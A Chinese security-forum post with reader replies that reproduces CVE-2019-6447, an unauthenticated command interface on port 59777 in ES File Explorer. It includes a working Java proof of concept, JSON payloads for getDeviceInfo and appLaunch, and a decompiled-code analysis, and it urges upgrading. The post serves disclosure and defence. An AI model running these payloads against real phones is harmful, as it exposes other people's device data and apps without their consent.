吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 24598|回复: 57
收起左侧

[Android 原创] ES文件浏览器 CVE-2019-6447 高危漏洞复现

  [复制链接]
1941368542 发表于 2019-1-22 08:47
今天看到关于ES文件浏览器的漏洞,觉得危险程度非常高,所以我简单的用java代码复现一下,首先关于ES文件浏览器,我就不多说了。非常著名的一款文件浏览器。
漏洞利用就是该软件运行之后开启TCP 59777端口,该端口未关闭导致可以通过HTTP协议POST请求接收JSON数据,进行解析执行返回结果。

环境:
win10,IDEA,JDK 1.8.0_181,一加5,Android P,ES文件浏览器4.1.9.7.4之前(我用的4.1.8.3.1)


复现:

[Java] 纯文本查看 复制代码
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
public class Test {
    public static void main(String[] args) {
String data = "{\"command\":\"getDeviceInfo\"}";
String path = "http://192.168.43.111:59777";
        URL url = null;
        try{
            url = new URL(path);
            HttpURLConnection conn = (HttpURLConnection) url.openConnection();
            conn.setRequestMethod("POST");
            conn.setConnectTimeout(5000);
            conn.setRequestProperty("User-Agent","curl/7.54.0");
            conn.setRequestProperty("Accept","*/*");
            conn.setRequestProperty("Content-Type","application/json");
            conn.setRequestProperty("Content-Length",data.length()+"");
            conn.setRequestProperty("Connection","close");
            conn.setDoOutput(true);
            conn.getOutputStream().write(data.getBytes());
            //获取响应码
            int code = conn.getResponseCode();
            System.out.println("响应码:"+code);
            //如果请求码为200
            if(code == 200){
                InputStream in = conn.getInputStream();
                String msg = tools.transStream(in);
                System.out.println(msg);
            }
        }catch (Exception e){
            e.printStackTrace();
        }
    }
}


返回结果:
[Java] 纯文本查看 复制代码
1
{"name":"ONEPLUS A5000", "ftpRoot":"/sdcard", "ftpPort":"3721"}

可以看到,我们通过POST请求提交了
[Java] 纯文本查看 复制代码
1
{"command":"getDeviceInfo"}
指令,就返回了我们手机的设备信息,更甚至我们可以通过指令来打开我们设备上安装的应用程序:
POST提交:
[Java] 纯文本查看 复制代码
1
{"command":"appLaunch", "appPackageName": "com.tencent.mm"}

提交该json数据,则可以直接打开我们手机上安装的微信。见GIF图

8.gif

漏洞简要分析:
本次漏洞主要在:
com.estrongs.fs.impl.adb.c
com.estrongs.android.f.a
这两个类里面,解压ES文件浏览器,得到4个dex文件
1.png

挨个使用jadx打开搜索command关键字,找到漏洞关键位置
在classes2.dex中定位到com.estrongs.android.f.a
可以看到在a方法内
2.png

通过command获取到对应的指令,然后执行相应的方法,
这里我就简单看一下获取设备信息的这条执指令:
3.png

在这里,如果
[Java] 纯文本查看 复制代码
1
str3.equals("getDeviceInfo")
成立,
则执行b这个方法,并将jSONObject传进去,我们下拉定位到b这个方法
4.png

可以看到这个方法是通过StringBuilder,进行拼接设备信息,
和ftpPort信息,然后进行返回。在看一下启动应用程序这条指令:
5.png

可以看到如果传来指令为appLaunch,
则执行a这个方法,并将jSONObject传递过去,下拉定位到a这个方法,
6.png

可以看到,他通过获取appPackageName对应的String,
然后进行非空判断,通过Intent将appPackageName对应的包名传入,
然后通过startActivity启动该应用程序。通过以上分析,我们可以看出,ES可以执行的指令还是很多的,有些危害还是比较严重的,
所以目前使用ES文件浏览器的,请尽快升级到最新版本。
7.png

可以看到最新版是已经修复了该漏洞了。

本文同步发布于我的个人博客和吾爱破解,转载请注明链接。
参考:
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln


免费评分

参与人数 18威望 +3 吾爱币 +27 热心值 +17 收起 理由
AinYtao + 1 + 1 大牛大牛
爱上猫鱼 + 1 厉害厉害
qtfreet00 + 3 + 12 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
mopp163 + 1 + 1 大佬啊!
笙若 + 1 + 1 我很赞同!
Geek233 + 1 我很赞同!
yuedingwangji + 1 + 1 支持原创,感谢讲解
smais + 1 + 1 高手,支持。
lookerJ + 1 + 1 用心讨论,共获提升!
夏雨微凉 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
chenjingyes + 1 + 1 :lol感谢楼主分享:lol
H_Kali + 1 + 1 谢谢@Thanks!
wangyujie96 + 1 + 1 谢谢@Thanks!家用路由器内添加访问规则禁止59777端口即可!
snccwt + 1 + 1 热心回复!
lswylhq + 1 + 1 谢谢@Thanks!
wg521125 + 1 + 1 给大牛点赞
Shutd0wn + 1 我很赞同!
goinfor2008 + 1 + 1 谢谢@Thanks!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| 1941368542 发表于 2019-1-22 16:42
smuuupl 发表于 2019-1-22 15:52
这么看,这不是ES文件浏览器内置的功能吗,咋还算上漏洞了。

是内置功能,但是不能任意人都可以向设备发送执行指令,最起码要对传入指令的身份合法性做一下校验。
 楼主| 1941368542 发表于 2019-1-22 10:05
pikachu888 发表于 2019-1-22 09:23
请问一下, 这个漏洞是只针对局域网吗?如果是自己家里的局域网没有别人的设备是不是没有影响

是的,局域网。
ty186 发表于 2019-1-22 08:59
啊啊!我还在用这个浏览器啊!要不要删除呢!!?
JinDex 发表于 2019-1-22 09:15
ty186 发表于 2019-1-22 08:59
啊啊!我还在用这个浏览器啊!要不要删除呢!!?

删除吧,不要用了
yang19950324 发表于 2019-1-22 09:15
看来是时候给我的ES文件浏览器升级一下了
DEFwa 发表于 2019-1-22 09:16
收藏一个备用,谢谢啦
pikachu888 发表于 2019-1-22 09:23
请问一下, 这个漏洞是只针对局域网吗?如果是自己家里的局域网没有别人的设备是不是没有影响
l1679668663 发表于 2019-1-22 09:27
嗯哼    还得多看会
iamprole 发表于 2019-1-22 09:35
还好我一直用的x-prole。
goinfor2008 发表于 2019-1-22 10:37
看了这贴子,虽然不懂代码,还是赶紧把ES文件浏览器升级一下安全些。谢谢LZ
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2025-3-31 02:28

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表